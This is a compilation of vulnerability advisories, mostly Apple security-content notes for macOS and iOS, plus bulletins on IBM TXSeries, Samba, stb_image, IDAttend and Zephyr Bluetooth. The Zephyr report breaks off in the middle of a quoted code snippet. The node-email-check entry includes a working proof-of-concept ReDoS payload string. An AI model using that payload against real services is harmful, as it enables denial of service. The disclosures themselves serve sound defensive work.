The issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.6.1. An app may be able to access protected user data.

Released October 25, 2023

**CoreAnimation**

Available for: macOS Ventura

Impact: An app may be able to cause a denial-of-service

Description: The issue was addressed with improved memory handling.

CVE-2023-40449: Tomi Tokics (@tomitokics) of iTomsn0w

**FileProvider**

Available for: macOS Ventura

Impact: An app may be able to cause a denial-of-service to Endpoint Security clients

Description: This issue was addressed by removing the vulnerable code.

CVE-2023-42854: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

**Find My**

Available for: macOS Ventura

Impact: An app may be able to read sensitive location information

Description: The issue was addressed with improved handling of caches.

CVE-2023-40413: Adam M.

**Foundation**

Available for: macOS Ventura

Impact: A website may be able to access sensitive user data when resolving symlinks

Description: This issue was addressed with improved handling of symlinks.

CVE-2023-42844: Ron Masas of BreakPoint.SH

**Image Capture**

Available for: macOS Ventura

Impact: An app may be able to access protected user data

Description: The issue was addressed with improved checks.

CVE-2023-41077: Mickey Jin (@patch1t)

**ImageIO**

Available for: macOS Ventura

Impact: Processing an image may result in disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2023-40416: JZ

**IOTextEncryptionFamily**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-40423: an anonymous researcher

**iperf3**

Available for: macOS Ventura

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: The issue was addressed with improved checks.

CVE-2023-38403

**Kernel**

Available for: macOS Ventura

Impact: An attacker that has already achieved kernel code execution may be able to bypass kernel memory mitigations

Description: The issue was addressed with improved memory handling.

CVE-2023-42849: Linus Henze of Pinauten GmbH (pinauten.de)

**Model I/O**

Available for: macOS Ventura

Impact: Processing a file may lead to unexpected app termination or arbitrary code execution

Description: The issue was addressed with improved memory handling.

CVE-2023-42856: Michael DePlante (@izobashi) of Trend Micro Zero Day Initiative

**Passkeys**

Available for: macOS Ventura

Impact: An attacker may be able to access passkeys without authentication

Description: The issue was addressed with additional permissions checks.

CVE-2023-40401: an anonymous researcher, weize she

**Pro Res**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-42841: Mingxuan Yang (@PPPF00L), happybabywu and Guang Gong of 360 Vulnerability Research Institute

**talagent**

Available for: macOS Ventura

Impact: An app may be able to access sensitive user data

Description: A permissions issue was addressed with additional restrictions.

CVE-2023-40421: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

**Weather**

Available for: macOS Ventura

Impact: An app may be able to access sensitive user data

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-41254: Cristian Dinca of "Tudor Vianu" National High School of Computer Science, Romania

**WindowServer**

Available for: macOS Ventura

Impact: A website may be able to access the microphone without the microphone use indicator being shown

Description: This issue was addressed by removing the vulnerable code.

CVE-2023-41975: an anonymous researcher

CVE-2023-41077: About the security content of macOS Ventura 13.6.1

A logic issue was addressed with improved state management. This issue is fixed in macOS Sonoma 14.1. An attacker with knowledge of a standard user's credentials can unlock another standard user's locked screen on the same Mac.

Released October 25, 2023

**App Support**

Available for: macOS Sonoma

Impact: Parsing a file may lead to an unexpected app termination or arbitrary code execution

Description: This issue was addressed by removing the vulnerable code.

CVE-2023-30774

**AppSandbox**

Available for: macOS Sonoma

Impact: An app may be able to access user-sensitive data

Description: A permissions issue was addressed with additional restrictions.

CVE-2023-40444: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

**Contacts**

Available for: macOS Sonoma

Impact: An app may be able to access sensitive user data

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-41072: Wojciech Regula of SecuRing (wojciechregula.blog) and Csaba Fitzl (@theevilbit) of Offensive Security

CVE-2023-42857: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

**CoreAnimation**

Available for: macOS Sonoma

Impact: An app may be able to cause a denial-of-service

Description: The issue was addressed with improved memory handling.

CVE-2023-40449: Tomi Tokics (@tomitokics) of iTomsn0w

**Emoji**

Available for: macOS Sonoma

Impact: An attacker may be able to execute arbitrary code as root from the Lock Screen

Description: The issue was addressed by restricting options offered on a locked device.

CVE-2023-41989: Jewel Lambert

**FileProvider**

Available for: macOS Sonoma

Impact: An app may be able to cause a denial-of-service to Endpoint Security clients

Description: This issue was addressed by removing the vulnerable code.

CVE-2023-42854: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

**Find My**

Available for: macOS Sonoma

Impact: An app may be able to read sensitive location information

Description: The issue was addressed with improved handling of caches.

CVE-2023-40413: Adam M.

**Foundation**

Available for: macOS Sonoma

Impact: A website may be able to access sensitive user data when resolving symlinks

Description: This issue was addressed with improved handling of symlinks.

CVE-2023-42844: Ron Masas of BreakPoint.SH

**ImageIO**

Available for: macOS Sonoma

Impact: Processing an image may result in disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2023-40416: JZ

**IOTextEncryptionFamily**

Available for: macOS Sonoma

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-40423: an anonymous researcher

**iperf3**

Available for: macOS Sonoma

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: The issue was addressed with improved checks.

CVE-2023-38403

**Kernel**

Available for: macOS Sonoma

Impact: An attacker that has already achieved kernel code execution may be able to bypass kernel memory mitigations

Description: The issue was addressed with improved memory handling.

CVE-2023-42849: Linus Henze of Pinauten GmbH (pinauten.de)

**LaunchServices**

Available for: macOS Sonoma

Impact: An app may be able to access sensitive user data

Description: The issue was addressed with improved permissions logic.

CVE-2023-42850: Thijs Alkemade (@xnyhps) from Computest Sector 7, Brian McNulty, Zhongquan Li

**Login Window**

Available for: macOS Sonoma

Impact: An attacker with knowledge of a standard user's credentials can unlock another standard user's locked screen on the same Mac

Description: A logic issue was addressed with improved state management.

CVE-2023-42861: Jon Crain, 凯 王, Brandon Chesser & CPU IT, inc, Matthew McLean, Steven Maser, and Avalon IT Team of Concentrix

**Mail Drafts**

Available for: macOS Sonoma

Impact: Hide My Email may be deactivated unexpectedly

Description: An inconsistent user interface issue was addressed with improved state management.

CVE-2023-40408: Grzegorz Riegel

**Maps**

Available for: macOS Sonoma

Impact: An app may be able to read sensitive location information

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-40405: Csaba Fitzl (@theevilbit) of Offensive Security

**Model I/O**

Available for: macOS Sonoma

Impact: Processing a file may lead to unexpected app termination or arbitrary code execution

Description: The issue was addressed with improved memory handling.

CVE-2023-42856: Michael DePlante (@izobashi) of Trend Micro Zero Day Initiative

**Networking**

Available for: macOS Sonoma

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A use-after-free issue was addressed with improved memory management.

CVE-2023-40404: Certik Skyfall Team

**Passkeys**

Available for: macOS Sonoma

Impact: An attacker may be able to access passkeys without authentication

Description: A logic issue was addressed with improved checks.

CVE-2023-42847: an anonymous researcher

**Photos**

Available for: macOS Sonoma

Impact: Photos in the Hidden Photos Album may be viewed without authentication

Description: An authentication issue was addressed with improved state management.

CVE-2023-42845: Bistrit Dahla

**Pro Res**

Available for: macOS Sonoma

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-42841: Mingxuan Yang (@PPPF00L), happybabywu and Guang Gong of 360 Vulnerability Research Institute

**Safari**

Available for: macOS Sonoma

Impact: Visiting a malicious website may reveal browsing history

Description: The issue was addressed with improved handling of caches.

CVE-2023-41977: Alex Renda

**Safari**

Available for: macOS Sonoma

Impact: Visiting a malicious website may lead to user interface spoofing

Description: An inconsistent user interface issue was addressed with improved state management.

CVE-2023-42438: Rafay Baloch & Muhammad Samaak, an anonymous researcher

**Siri**

Available for: macOS Sonoma

Impact: An attacker with physical access may be able to use Siri to access sensitive user data

Description: This issue was addressed by restricting options offered on a locked device.

CVE-2023-41982: Bistrit Dahla

CVE-2023-41997: Bistrit Dahla

CVE-2023-41988: Bistrit Dahla

**talagent**

Available for: macOS Sonoma

Impact: An app may be able to access sensitive user data

Description: A permissions issue was addressed with additional restrictions.

CVE-2023-40421: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

**Terminal**

Available for: macOS Sonoma

Impact: An app may be able to access sensitive user data

Description: The issue was addressed with improved checks.

CVE-2023-42842: an anonymous researcher

**Vim**

Available for: macOS Sonoma

Impact: Processing malicious input may lead to code execution

Description: A use-after-free issue was addressed with improved memory management.

CVE-2023-4733

CVE-2023-4734

CVE-2023-4735

CVE-2023-4736

CVE-2023-4738

CVE-2023-4750

CVE-2023-4751

CVE-2023-4752

CVE-2023-4781

**Weather**

Available for: macOS Sonoma

Impact: An app may be able to access sensitive user data

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-41254: Cristian Dinca of "Tudor Vianu" National High School of Computer Science, Romania

**WebKit**

Available for: macOS Sonoma

Impact: Processing web content may lead to arbitrary code execution

Description: The issue was addressed with improved memory handling.

WebKit Bugzilla: 259836  
CVE-2023-40447: 이준성(Junsung Lee) of Cross Republic

**WebKit**

Available for: macOS Sonoma

Impact: Processing web content may lead to arbitrary code execution

Description: A use-after-free issue was addressed with improved memory management.

WebKit Bugzilla: 259890  
CVE-2023-41976: 이준성(Junsung Lee)

**WebKit**

Available for: macOS Sonoma

Impact: Processing web content may lead to arbitrary code execution

Description: A logic issue was addressed with improved checks.

WebKit Bugzilla: 260173  
CVE-2023-42852: an anonymous researcher

**WebKit Process Model**

Available for: macOS Sonoma

Impact: Processing web content may lead to a denial-of-service

Description: The issue was addressed with improved memory handling.

WebKit Bugzilla: 260757  
CVE-2023-41983: 이준성(Junsung Lee)

**WindowServer**

Available for: macOS Sonoma

Impact: A website may be able to access the microphone without the microphone use indicator being shown

Description: This issue was addressed by removing the vulnerable code.

CVE-2023-41975: an anonymous researcher

CVE-2023-42861: About the security content of macOS Sonoma 14.1

The issue was addressed with improved handling of caches. This issue is fixed in macOS Sonoma 14.1, iOS 16.7.2 and iPadOS 16.7.2. Visiting a malicious website may reveal browsing history.

Released October 25, 2023

**CoreAnimation**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to cause a denial-of-service

Description: The issue was addressed with improved memory handling.

CVE-2023-40449: Tomi Tokics (@tomitokics) of iTomsn0w

**Find My**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to read sensitive location information

Description: The issue was addressed with improved handling of caches.

CVE-2023-40413: Adam M.

**ImageIO**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing an image may result in disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2023-40416: JZ

**IOTextEncryptionFamily**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-40423: an anonymous researcher

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An attacker that has already achieved kernel code execution may be able to bypass kernel memory mitigations

Description: The issue was addressed with improved memory handling.

CVE-2023-42849: Linus Henze of Pinauten GmbH (pinauten.de)

**Mail Drafts**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Hide My Email may be deactivated unexpectedly

Description: An inconsistent user interface issue was addressed with improved state management.

CVE-2023-40408: Grzegorz Riegel

**mDNSResponder**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A device may be passively tracked by its Wi-Fi MAC address

Description: This issue was addressed by removing the vulnerable code.

CVE-2023-42846: Talal Haj Bakry and Tommy Mysk of Mysk Inc. @mysk\_co

**Pro Res**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-42841: Mingxuan Yang (@PPPF00L), happybabywu and Guang Gong of 360 Vulnerability Research Institute

**Safari**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Visiting a malicious website may reveal browsing history

Description: The issue was addressed with improved handling of caches.

CVE-2023-41977: Alex Renda

**Siri**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An attacker with physical access may be able to use Siri to access sensitive user data

Description: This issue was addressed by restricting options offered on a locked device.

CVE-2023-41997: Bistrit Dahla

CVE-2023-41982: Bistrit Dahla

**Weather**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to access sensitive user data

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-41254: Cristian Dinca of "Tudor Vianu" National High School of Computer Science, Romania

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A user's password may be read aloud by VoiceOver

Description: This issue was addressed with improved redaction of sensitive information.

WebKit Bugzilla: 248717  
CVE-2023-32359: Claire Houston

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing web content may lead to arbitrary code execution

Description: The issue was addressed with improved memory handling.

WebKit Bugzilla: 259836  
CVE-2023-40447: 이준성(Junsung Lee) of Cross Republic

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing web content may lead to arbitrary code execution

Description: A logic issue was addressed with improved checks.

WebKit Bugzilla: 260173  
CVE-2023-42852: an anonymous researcher

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing web content may lead to arbitrary code execution

Description: A use-after-free issue was addressed with improved memory management.

WebKit Bugzilla: 259890  
CVE-2023-41976: 이준성(Junsung Lee)

**WebKit Process Model**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing web content may lead to a denial-of-service

Description: The issue was addressed with improved memory handling.

WebKit Bugzilla: 260757  
CVE-2023-41983: 이준성(Junsung Lee)

CVE-2023-41977: About the security content of iOS 16.7.2 and iPadOS 16.7.2

A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Sonoma 14.1, iOS 17.1 and iPadOS 17.1. An app may be able to access sensitive user data.

Released October 25, 2023

**Contacts**

Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to access sensitive user data

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-41072: Wojciech Regula of SecuRing (wojciechregula.blog) and Csaba Fitzl (@theevilbit) of Offensive Security

CVE-2023-42857: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

**CoreAnimation**

Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to cause a denial-of-service

Description: The issue was addressed with improved memory handling.

CVE-2023-40449: Tomi Tokics (@tomitokics) of iTomsn0w

**Find My**

Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to read sensitive location information

Description: The issue was addressed with improved handling of caches.

CVE-2023-40413: Adam M.

**ImageIO**

Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later

Impact: Processing an image may result in disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2023-40416: JZ

**IOTextEncryptionFamily**

Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-40423: an anonymous researcher

**Kernel**

Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later

Impact: An attacker that has already achieved kernel code execution may be able to bypass kernel memory mitigations

Description: The issue was addressed with improved memory handling.

CVE-2023-42849: Linus Henze of Pinauten GmbH (pinauten.de)

**Mail Drafts**

Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later

Impact: Hide My Email may be deactivated unexpectedly

Description: An inconsistent user interface issue was addressed with improved state management.

CVE-2023-40408: Grzegorz Riegel

**mDNSResponder**

Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later

Impact: A device may be passively tracked by its Wi-Fi MAC address

Description: This issue was addressed by removing the vulnerable code.

CVE-2023-42846: Talal Haj Bakry and Tommy Mysk of Mysk Inc. @mysk\_co

**Passkeys**

Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later

Impact: An attacker may be able to access passkeys without authentication

Description: A logic issue was addressed with improved checks.

CVE-2023-42847: an anonymous researcher

**Photos**

Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later

Impact: Photos in the Hidden Photos Album may be viewed without authentication

Description: An authentication issue was addressed with improved state management.

CVE-2023-42845: Bistrit Dahla

**Pro Res**

Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-42841: Mingxuan Yang (@PPPF00L), happybabywu and Guang Gong of 360 Vulnerability Research Institute

**Siri**

Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later

Impact: An attacker with physical access may be able to use Siri to access sensitive user data

Description: This issue was addressed by restricting options offered on a locked device.

CVE-2023-41982: Bistrit Dahla

CVE-2023-41997: Bistrit Dahla

CVE-2023-41988: Bistrit Dahla

**Status Bar**

Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later

Impact: A device may persistently fail to lock

Description: The issue was addressed with improved UI handling.

CVE-2023-40445: Ting Ding, James Mancz, Omar Shibli, an anonymous researcher, Lorenzo Cavallaro, and Harry Lewandowski

**Weather**

Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to access sensitive user data

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-41254: Cristian Dinca of "Tudor Vianu" National High School of Computer Science, Romania

**WebKit**

Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later

Impact: Processing web content may lead to arbitrary code execution

Description: The issue was addressed with improved memory handling.

WebKit Bugzilla: 259836  
CVE-2023-40447: 이준성(Junsung Lee) of Cross Republic

**WebKit**

Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later

Impact: Processing web content may lead to arbitrary code execution

Description: A use-after-free issue was addressed with improved memory management.

WebKit Bugzilla: 259890  
CVE-2023-41976: 이준성(Junsung Lee)

**WebKit**

Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later

Impact: Processing web content may lead to arbitrary code execution

Description: A logic issue was addressed with improved checks.

WebKit Bugzilla: 260173  
CVE-2023-42852: an anonymous researcher

**WebKit Process Model**

Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later

Impact: Processing web content may lead to a denial-of-service

Description: The issue was addressed with improved memory handling.

WebKit Bugzilla: 260757  
CVE-2023-41983: 이준성(Junsung Lee)

CVE-2023-42857: About the security content of iOS 17.1 and iPadOS 17.1

A heap-based Buffer Overflow flaw was discovered in Samba. It could allow a remote, authenticated attacker to exploit this vulnerability to cause a denial of service.

**Red Hat Product Security Center**

Engage with our Red Hat Product Security team, access security updates, and ensure your environments are not exposed to any known security vulnerabilities.

Product Security Center

CVE-2023-5568: cve-details

IBM TXSeries for Multiplatforms, 8.1, 8.2, and 9.1, CICS TX Standard CICS TX Advanced 10.1 and 11.1 could allow a privileged user to cause a denial of service due to uncontrolled resource consumption.  IBM X-Force ID:  266016.

  

**Summary**

Improper input validation may lead to a Denial of Service attack in web services with IBM TXSeries for Multiplatforms. IBM TXSeries for Multiplatforms has addressed the applicable issue.

**Vulnerability Details**

**CVEID:**   CVE-2023-42031  
**DESCRIPTION:**   IBM CICS TX could allow a privileged user to cause a denial of service due to uncontrolled resource consumption.  
CVSS Base score: 4.9  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/266061 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H)

**Affected Products and Versions**

**Affected Product(s)**

**Version(s)**

IBM TXSeries for Multiplatforms

8.1

IBM TXSeries for Multiplatforms

8.2

IBM TXSeries for Multiplatforms

9.1

**Remediation/Fixes**

**Product**

**Version(s)**

**Platform(s)**

**Remediation/Fix**

IBM TXSeries for Multiplatforms

8.1

Linux, AIX

PSIRT fixes for TXSeries 8.1 will be provided only for extended support customers with request through Salesforce case

IBM TXSeries for Multiplatforms

8.2

Linux, AIX

Please refer to this documentation

IBM TXSeries for Multiplatforms

9.1

Linux, AIX

Please refer to this documentation

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

**Change History**

20 Oct 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SSAL2T","label":"TXSeries for Multiplatforms"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"},{"code":"PF002","label":"AIX"}\],"Version":"8.1, 8.2, 9.1","Edition":"","Line of Business":{"code":"LOB35","label":"Mainframe SW"}}\]

CVE-2023-42031: Security Bulletin: Improper input validation may lead to a Denial of Service attack in web services with IBM TXSeries for Multiplatforms

Double Free vulnerability in Nothings Stb Image.h v.2.28 allows a remote attacker to cause a denial of service via a crafted file to the stbi_load_gif_main function.

\[CVE ID\]

CVE-2023-43281

\[PRODUCT\]

Nothings(https://github.com/nothings/stb) Stb Image.h

\[VERSION\]

2.28

\[PROBLEM TYPE\]

Double free

\[DESCRIPTION\]

Double Free vulnerability in Nothings Stb Image.h v.2.28 allows a remote attacker to cause a denial of service via a crafted file to the stbi\_load\_gif\_main function.

\[DETAILS\]

You can see this link, https://github.com/peccc/double-stb.

CVE-2023-43281: gist:d8761f6ac45ad55cbd194dd7e6fdfdac

ReDos in NPMJS Node Email Check v.1.0.4 allows an attacker to cause a denial of service via a crafted string to the scpSyntax component.

The regex on line 10. inside https://github.com/teomantuncer/node-email-check/blob/main/main.js is vulnerable to a Regex Denial of Service

if a malicious string is provided causing the application using the package to hang.

Proof of concept code to test it:

const emailCheck = require('node-email-check');

// async request with mx check

//await emailCheck.isValid('example@email.com');

// sync request without mx check

console.time('\[ + \] Time passed -> ');

//payload

var chck = emailCheck.isValidSync('-@{IPv6:5:3:2:3:227IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"IPv6"');

//var chck = emailCheck.isValidSync('validemail@example.com');

console.log(chck);

console.timeEnd('\[ + \] Time passed -> ');

CVE-2023-39619: Vulnerability inside the node-email-check npm package through version 1.0.4

Missing authentication in the SetDB method in IDAttend’s IDWeb application 3.1.052 and earlier allows denial of service or theft of database login credentials.  

Discovered by Jack Misiura on behalf of The Missing Link Security

**Vulnerability Details**

Missing authentication in the SetDB method in IDAttend’s IDWeb application 3.1.013 allows denial of service or theft of database login credentials.   

**Affected Versions**

Discovered in: 3.1.013

**Fixed Versions**

Fixed in: 3.1.053

CVE-2023-26573: Missing Authentication In IDAttend’s IDWeb Application

Potential buffer overflows in the Bluetooth subsystem due to asserts being disabled in /subsys/bluetooth/host/hci_core.c




**Summary**

I spotted some additional buffer overflow vulnerabilities at the following locations in the Zephyr Bluetooth subsystem source code:  
https://github.com/zephyrproject-rtos/zephyr/blob/main/subsys/bluetooth/controller/ll\_sw/ull\_adv.c  
https://github.com/zephyrproject-rtos/zephyr/blob/main/subsys/bluetooth/host/hci\_core.c  
https://github.com/zephyrproject-rtos/zephyr/blob/main/subsys/bluetooth/host/iso.c

**Details**

Potential integer underflow due to ineffective assert check leading to buffer overflow in /subsys/bluetooth/controller/ll\_sw/ull\_adv.c:

uint8\_t ll\_adv\_params\_set(uint16\_t interval, uint8\_t adv\_type,
		       uint8\_t own\_addr\_type, uint8\_t direct\_addr\_type,
		       uint8\_t const \*const direct\_addr, uint8\_t chan\_map,
		       uint8\_t filter\_policy)
{
...
#if defined(CONFIG\_BT\_CTLR\_AD\_DATA\_BACKUP)
	/\* Backup the legacy AD Data if switching to legacy directed advertising
	 \* or to Extended Advertising.
	 \*/
	if (((pdu\->type \== PDU\_ADV\_TYPE\_DIRECT\_IND) ||
	     (IS\_ENABLED(CONFIG\_BT\_CTLR\_ADV\_EXT) &&
	      (pdu\->type \== PDU\_ADV\_TYPE\_EXT\_IND))) &&
	    (pdu\_type\_prev != PDU\_ADV\_TYPE\_DIRECT\_IND) &&
	    (!IS\_ENABLED(CONFIG\_BT\_CTLR\_ADV\_EXT) ||
	     (pdu\_type\_prev != PDU\_ADV\_TYPE\_EXT\_IND))) {
		if (pdu\->len \== 0U) {
			adv\->ad\_data\_backup.len \= 0U;
		} else {
			LL\_ASSERT(pdu\->len >=
				  offsetof(struct pdu\_adv\_adv\_ind, data)); /\* VULN: assert \*/

			adv\->ad\_data\_backup.len \= pdu\->len \-
